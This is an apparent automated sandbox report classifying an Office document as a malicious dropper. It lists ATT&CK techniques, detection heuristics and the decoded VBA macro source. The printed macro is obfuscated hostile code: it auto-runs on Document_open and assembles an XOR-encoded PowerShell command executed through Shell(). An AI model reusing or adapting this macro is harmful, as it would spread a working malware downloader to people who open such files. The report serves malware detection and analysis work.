MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers a 'Shell()' call, which is indicative of a dropper or downloader. The ClamAV detection 'Doc.Dropper.Agent-6584582-0' further supports this, suggesting the file's purpose is to download and execute a secondary payload. No specific family could be identified.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6584582-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6584582-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
hCCHvT = (92551 * Sgn(GaNdl) / 54488 / lJmGd * XwKkw + ChrW(UzqIr) / YHjzsq * CInt(bTwdp)) zjIzJGvz = Jzbok + VBA.Shell(bIKGOuWMLtw + Chr(fZZqMAC + vbKeyP + uvpWOuRAQ) + "owers" + IaOGWPV + riTmobX + uLzFzf + rkCFhimBYMq + mvVTbOPKT, 82195 - 82195) hdwjr = Rnd(SBaKE) -
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_open() On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9704 bytes |
SHA-256: f1a78e06d1857596511aaec0a242e739ee95a1567351b00cc7cc1656e71b03f4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NATGSfsEDdpmti"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zjIzJGvz()
On Error Resume Next
FMwkAE = Rnd(voKaVJ)
qPvTo = VsSHD
RGMSo = 19906 + ijXcr
MQdZN = (9857 * Sgn(oFmHBz) / 90612 / najbII * AjtqmJ + ChrW(TwzJQc) / cFSSwC * CInt(EHtWt))
hRmjus = Rnd(QzfXSV)
vYzUt = GBMSOY
mnIsj = 36629 + KVNILG
cfZvzb = (4179 * Sgn(RzBpas) / 45501 / YXjlJU * jCZru + ChrW(apdIUK) / vSJkEr * CInt(YzfSmi))
ovfmp = Rnd(GtsZk)
qAiXG = Ljluw
rqJYh = 10924 + sAFOwh
fCYCZ = (68657 * Sgn(wAnPZ) / 96746 / EpDjh * FXSGKV + ChrW(fwKFP) / LajUw * CInt(iwlRCl))
YtAVc = Rnd(MSPHj)
DCiTF = VBwZi
rEQVz = 79481 + zzmmXV
hCCHvT = (92551 * Sgn(GaNdl) / 54488 / lJmGd * XwKkw + ChrW(UzqIr) / YHjzsq * CInt(bTwdp))
zjIzJGvz = Jzbok + VBA.Shell(bIKGOuWMLtw + Chr(fZZqMAC + vbKeyP + uvpWOuRAQ) + "owers" + IaOGWPV + riTmobX + uLzFzf + rkCFhimBYMq + mvVTbOPKT, 82195 - 82195)
hdwjr = Rnd(SBaKE)
vnBjY = UfOXX
XzRbEP = 35893 + lNUnn
zwZqw = (93753 * Sgn(FUrBzO) / 67727 / TTUIJ * ZOiztm + ChrW(XskuEr) / UwvOY * CInt(hwElB))
pKBMt = Rnd(OQZku)
zOdJtw = wYVjri
EKsicG = 14496 + XSqWXF
aqkCFK = (26217 * Sgn(zTwiF) / 89453 / Ufoni * CwaBr + ChrW(NTMwPc) / zcFTR * CInt(WdOJKO))
End Function
Private Sub Document_open()
On Error Resume Next
haEqrD = Rnd(YYuJB)
sHnnm = mzvnP
hzAmX = 68655 + AzuOL
FLchY = (64996 * Sgn(SDOWdc) / 73669 / Nsjjpi * LskkH + ChrW(POlMkQ) / XZSYM * CInt(tTdlJ))
ApZGL = Rnd(ZslAk)
XkAhH = ZHCpHa
oaDCpc = 19040 + MUCnZL
KXjXp = (42408 * Sgn(mOqiBb) / 32056 / jmlhAl * HkScV + ChrW(SAMhC) / ionfw * CInt(biIuV))
zjIzJGvz
jKabQE = Rnd(ZUIQwE)
ZDtNOm = KorkIH
AVTNd = 94340 + XiKsHm
iZYram = (5808 * Sgn(OvQYi) / 15898 / PiIRwA * OChSP + ChrW(hbcVpV) / ImBjAa * CInt(owwpE))
iYIcqK = Rnd(RKVJIW)
jbQGr = aGISA
YmSui = 23926 + TdhbQ
ftXzRr = (46143 * Sgn(NuBjBG) / 84541 / PvbAZ * vquPRv + ChrW(GQURQD) / wVLpD * CInt(IlZkEk))
End Sub
Attribute VB_Name = "FrNrAErzhD"
Function IaOGWPV()
On Error Resume Next
dZwzMw = dOTUdA
jzNNZ = Rnd(jSnzp)
VzPoHf = 7383 + UpuHL
jTrJY = (67820 * Sgn(dqNWms) / 81664 / qDGBdj * VnmqJ + ChrW(ivTifl) / BwkibL * CInt(jidZGo))
clWHVEHwooI = "He" + "LL & ( " + "$EN" + "V:cOMS" + "peC[4,15,25" + "]-Join'')([STri" + "Ng]::joi" + "N( '', ('14,"
nKMkV = LfFCH
XPObXi = Rnd(zDWiZ)
uuusHG = 9996 + sSYZRj
MDuOA = (4338 * Sgn(FoolS) / 99471 / hfzqBF * BKsJzE + ChrW(jPopzD) / tzEXXw * CInt(kwZukl))
bGiDczAjr = "93" + "u127u65H78" + ",67m65H10" + "G23" + "G10d68u79H93u" + "7{69G72Q64Y" + "79u73Y94Y10G88" + "Y75m6"
MTPNS = DjYnwz
fiPBBE = Rnd(tBECz)
VYAvSv = 81063 + htSdHU
AwAVaK = (17426 * Sgn(wdcov) / 85827 / pzXukt * ipoinR + ChrW(bITwHm) / swDwLF * CInt(pmYXH))
vJOSL = "8%78Y69,71H17G1" + "4m95%102G95%99" + "d64%10H" + "23m10d68" + "d79Q93H7m69" + "%72Y64G7" + "9m73d94u1" + "0{12" + "1G83d" + "89Q94m79Y71Q"
TtCPHj = AArPh
rbQDP = Rnd(TNKjvW)
SWVIsn = 11489 + wBTzY
TXhPI = (50471 * Sgn(nrUdj) / 68799 / ruawG * AAUIRo + ChrW(iRWdsL) / mpOlL * CInt(FAcZZ))
wPRikwlLtd = "4,100Y79u94Y4d1" + "25d79," + "72Q105H7" + "0d67u79" + ",68G" + "94" + "%17" + "Q14" + "u80%80H124,"
jlzYui = QKJMwi
XfVFav = Rnd(qTSDZ)
TkpVUq = 70345 + POBjo
UATmon = (84847 * Sgn(PfHioN) / 14457 / TZlKZ * UuIqQ + ChrW(ajJXI) / BPuPr * CInt(szVTQ))
bvInfDUzwuZ = "109H" + "96H80u" + "10m23,10," + "13%66%" + "94Y94,9" + "0{16,5%5" + ",88H69%" + "71" + "Y75%68u73," + "79H73G66d4G73"
ScjAiw = vthrWM
tUJsp = Rnd(KXKPjZ)
zXpMjW = 69499 + nLsXEi
qljUmt = (55423 * Sgn(kmzjl) / 11552 / RVkEZ * iffvj + ChrW(cwfsz) / pzZIC * CInt(oIPrz))
zkWcSN = "H69d71,5u99G65G" + "76" + "Y79,94H1" + "02Q5u106m66%94"
ITRPQp = iczUJp
zLqmb = Rnd(GSnjH)
DZFsA = 13291 + tzJvI
TlhjJ = (80641 * Sgn(FcMvI) / 16589 / DGoPiD * soCXr + ChrW(Xacki) / mmIPZ * CInt(SOCrEU))
pDTfLp = "Q94%90u16Y5H5" + ",70m79G6" + "4{69Y" + "70%67u79" + "G78Y69m73Q79d89" + "H4Y73,69Y71H4" + "H72,88%5%6" + "9H120m120,102"
dQoQA = iOKLsE
jFfWI = Rnd(bmAbw)
MSZwfz = 54211 + zVzuq
fHYlK = (22737 * Sgn(NUtSXr) / 55289 / LKFkf * bKzkaM + ChrW(zHOEaf) / FYkoiF * CInt(JXWsJ))
QHUOFijnCqz = "%125%70d30Q122" + "G5" + "G106Q66%94d94," + "90" + "d16Q" + "5H5d9" + "4%88%69u89{" + "79,4d69%" + "88,77m5{"
IaOGWPV = clWHVEHwooI + bGiDczAjr + vJOSL + wPRikwlLtd + bvInfDUzwuZ + zkWcSN + pDTfLp + QHUOFijnCqz
End Function
Function riTmobX()
On Error Resume Next
aqRnb = RFUtHI
bDAFH = Rnd(bEwbB)
zoPMiO = 93896 + jBmaQ
CErJwj = (9102 * Sgn(RmwsIv) / 93993 / aRaoFz * nIAJSt + ChrW(WFWRu) / prprM * CInt(JEVvS))
rjTkLXI = "72" + "Y126H92%67," + "11" + "0d103%92u25" + "G70Y98,5G106%6" + "6,94G94" + "d90,16G5m" + "5Q78d79Q65d69Q8"
jSNhNw = ZtYCa
UfucjU = Rnd(ETEAwZ)
qzQqVq = 3503 + libjco
okrtRa = (52178 * Sgn(niZcu) / 60995 / LBzrCQ * mnPMoc + ChrW(WRTQM) / ArhRC * CInt(csnnF))
djIpiisvf = "8m" + "71H73H" + "4u90G70" + "G5G64G89Y5Q92u1" + "21G27G"
ppnuwz = tVHJd
SUOsa = Rnd(XYBwE)
EmwoRM = 11265 + hfsUT
JtnzCn = (7031 * Sgn(QOobb) / 65388 / lncuZu * hlGAE + ChrW(LQrfn) / wRtfq * CInt(PTZbzS))
qzZzsXNOM = "125u83" + "%98,127d105" + "Q79H24d5" + "u106,66" + "d94u94H90u1"
JbvGl = dnEEhM
RPHii = Rnd(EwnLC)
BijAzW = 16768 + FlcsHl
jZIGq = (74363 * Sgn(zjSZEq) / 59523 / jnOat * uUsFQ + ChrW(YufwR) / sFfcV * CInt(UzNdI))
cfmuUQtipo = "6{5u5d93u93m93" + "%4Y94m79d90Y70" + "H67Q83u78Q" + "69d" + "71,27G" + "19{"
riTmobX = rjTkLXI + djIpiisvf + qzZzsXNOM + cfmuUQtipo
End Function
Function uLzFzf()
On Error Resume Next
DRNFvo = MVEVw
BvILH = Rnd(pHTOo)
QAahP = 8559 + WHuwZ
nOGKq = (57689 * Sgn(bLUbn) / 65114 / cmOGw * aDwcBY + ChrW(WsuwE) / DRmQzE * CInt(JKszl))
HsVKMiltv = "4%88m95" + "%5m102%" + "78G19H73%" + "95{70u1"
BcZQL = qjKuj
NfpaH = Rnd(YNmjPd)
SEuiQ = 46106 + CispV
nzfXQ = (64418 * Sgn(momQO) / 52947 / ZOPinA * qvwoV + ChrW(OnaHJ) / QdYrf * CInt(KSjdP))
TMDrwbPQFvC = "01H5%13" + "Q4Q121" + "H90" + "{70,67d" + "94Q2" + "u13H106"
XkUci = Mfkcj
Lokcb = Rnd(bHjNz)
jjvJI = 98821 + iGALz
lLGfCh = (5241 * Sgn(VIwSBJ) / 69212 / lFKdm * EjGiws + ChrW(XwGOVX) / HwDTIR * CInt(PnCbYl))
vSQjGNULVn = "{13u3,17{14Y104" + "m114u92" + "u67,95u1" + "09u1" + "0m23Q10u14m93Q" + "127" + "d65m78G67G65" + "H4%68{79"
pvEDZH = cUnLTN
uiSDCJ = Rnd(XYXjK)
wJqEjm = 91640 + mCqVU
kZfkwV = (63154 * Sgn(zzvmp) / 80324 / cbhhM * bUUJC + ChrW(VoCtN) / NXMWG * CInt(wQjwG))
lIptTA = "Q82d94%2Q27u6d1" + "0u19m18m" + "19Q2" + "9u18,31{3Y17m1" + "4{100%66Q1" + "05%126m69d10"
uLzFzf = HsVKMiltv + TMDrwbPQFvC + vSQjGNULVn + lIptTA
End Function
Function rkCFhimBYMq()
On Error Resume Next
VKjvj = NMWkMA
mSwUs = Rnd(dlBRJ)
LavML = 32976 + EhObSv
pQbWwO = (13090 * Sgn(fblES) / 5450 / aYqiZ * rSCGkj + ChrW(wELALU) / oGrfD * CInt(vpjzqN))
TcMOAbHrP = "%23{1" + "0d14H79u68" + "%92%16Y94G79" + "m71,90{10" + "Y1{10Q13Q118" + "m13Y10d1m1" + "0G14u104%114u9" + "2u67%95{109{10"
BjEPWF = MGRSkL
Kmzuha = Rnd(wzZQL)
NLbQlt = 95868 + OUhKak
qjbTV = (51001 * Sgn(OTLwQc) / 92724 / QjHpS * OVAocf + ChrW(UwTJmq) / oFqFK * CInt(mQtSG))
dIQBiij = "u1,10%" + "13u4Q79Q82,79{" + "13G17m" + "76u69d88%" + "79u75d73H66%2," + "14,8" + "0H127%88%1"
Kzbii = tDfRIP
mvphLu = Rnd(JcLaft)
kuUrnd = 73376 + dLsBf
hucfLM = (30052 * Sgn(swBfd) / 82412 / RipJO * wijrwt + ChrW(jPCjY) / EdAfjp * CInt(mSBaD))
LBcbTnI = "27u73H64H10," + "67G6" + "8%" + "10{14G80d80G" + "124u109Y96H80u3" + ",81%94" + "Y88%8" + "3m81%14u95,102{" + "95d9" + "9Y64m4{110H69"
Twujc = oskVt
IjmAb = Rnd(AMjQtn)
SOrdt = 35274 + umjQz
ajXWV = (25680 * Sgn(rRXBu) / 78842 / HwKWw * BTjBR + ChrW(njzWh) / wOSijY * CInt(WIHqw))
kCpMj = "G93H68Q70m69Y" + "75Y7" + "8u1" + "08m6" + "7Q70%79%2,14," + "80{127u88Y127m" + "73u64m4u1" + "26Y69,121,94," + "88u67d68{77Y2" + "H3m"
FZNtcj = RLTiH
zrUBsi = Rnd(YXNHD)
ESZXs = 91150 + IwaqZN
TUbBKi = (24549 * Sgn(zwkPv) / 13729 / DQdciw * wJTiU + ChrW(mGGpl) / WnVYf * CInt(ARIdci))
ktmiSLIt = "6m10d14G100G" + "66G105%12" + "6m69%3Y17" + "m121u94u75,"
iAVhpw = DXLRjI
cPOvpG = Rnd(rKVRhj)
uhrpv = 58671 + lBhszi
LREqz = (68038 * Sgn(kQnhz) / 87823 / NhCrYw * KAksj + ChrW(rJfYL) / YZjdB * CInt(wYujhz))
DzbYDR = "88m94H7{12" + "2%88d69m" + "73" + "Y79" + "G89d89Y10"
aSaSk = jSCTW
DApqIZ = Rnd(KCARU)
QQOalP = 42260 + URdDBt
ALWYSI = (5415 * Sgn(iJUzSd) / 23980 / iMmHfm * jawjwk + ChrW(MHOQVR) / sKvwMq * CInt(wdAHp))
IUjSwLia = "Y14%100G66,105" + "{126G69" + "m17Y" + "72d88{79H" + "75u65u17m87m7"
wwcGmN = bwzHp
kpjPTN = Rnd(nwUZGz)
zMjCHu = 69757 + BrITvT
uqVsP = (11019 * Sgn(ltwzv) / 26011 / ooHzSI * BVwzK + ChrW(blkFz) / ZvKVQ * CInt(pAwDA))
ciJMRdh = "3G75" + ",94Q7" + "3Q66" + "{81" + ",93u88u67H9" + "4,79{7%"
IDwVTo = FtwtHK
LZShmr = Rnd(pjIsVZ)
EhrAIs = 99565 + nwiSrv
RDpwX = (98878 * Sgn(IwuHd) / 41461 / UDUzBM * EtzFE + ChrW(cwBPl) / SWupWU * CInt(VzEDOq))
ZfzpbDI = "66" + "u69%89%94{" + "10m14%117u" + "4u111H82H73H" + "79{90Y94m67{69" + "H68u4Q1" + "03Q79d89d89," + "75u77{79H17,"
rkCFhimBYMq = TcMOAbHrP + dIQBiij + LBcbTnI + kCpMj + ktmiSLIt + DzbYDR + IUjSwLia + ciJMRdh + ZfzpbDI
End Function
Function mvVTbOPKT()
On Error Resume Next
qYzpl = lTsIX
Akqit = Rnd(wzMJp)
TffKwf = 42625 + DOZOwf
fqSKk = (99147 * Sgn(AQqpIY) / 84909 / PlKcj * zHaMT + ChrW(bhMmC) / JqzkE * CInt(OSipAi))
aDpfUpOHa = "87%87'.S" + "Pl" + "it( 'Ydm{QG," + "uH%' )| %{ [" + "cha"
NjJHr = CLOKf
RtNWhh = Rnd(rHfjrz)
vETDD = 75452 + PBFihV
WhBLO = (87336 * Sgn(XTOLm) / 94131 / IBrHsz * SiYVb + ChrW(cOjqIY) / QBNqqk * CInt(zuwXXK))
GjpldUH = "r]" + "( $_-bxor 0x2A" + " ) " + "} )) )"
mvVTbOPKT = aDpfUpOHa + GjpldUH
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.